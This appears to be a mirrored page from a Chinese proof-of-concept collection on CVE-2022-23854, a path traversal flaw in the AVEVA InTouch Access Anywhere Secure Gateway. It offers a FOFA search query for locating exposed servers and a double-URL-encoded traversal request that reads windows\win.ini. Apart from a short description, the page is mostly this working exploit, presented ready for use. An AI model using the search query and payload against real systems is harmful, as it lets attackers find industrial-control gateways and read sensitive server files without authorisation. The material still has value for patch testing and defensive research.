mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 11:58:05 +00:00
31 lines
722 B
Markdown
31 lines
722 B
Markdown
# AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854
|
||
|
||
## 漏洞描述
|
||
|
||
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞,未授权的攻击者可利用该漏洞获取服务器敏感信息。
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
AVEVA InTouch安全网关
|
||
```
|
||
|
||
## FOFA
|
||
|
||
```
|
||
body="InTouch Access Anywhere"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
登录页面
|
||
|
||
|
||
|
||
验证POC
|
||
|
||
```
|
||
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
|
||
```
|
||
|
||
 |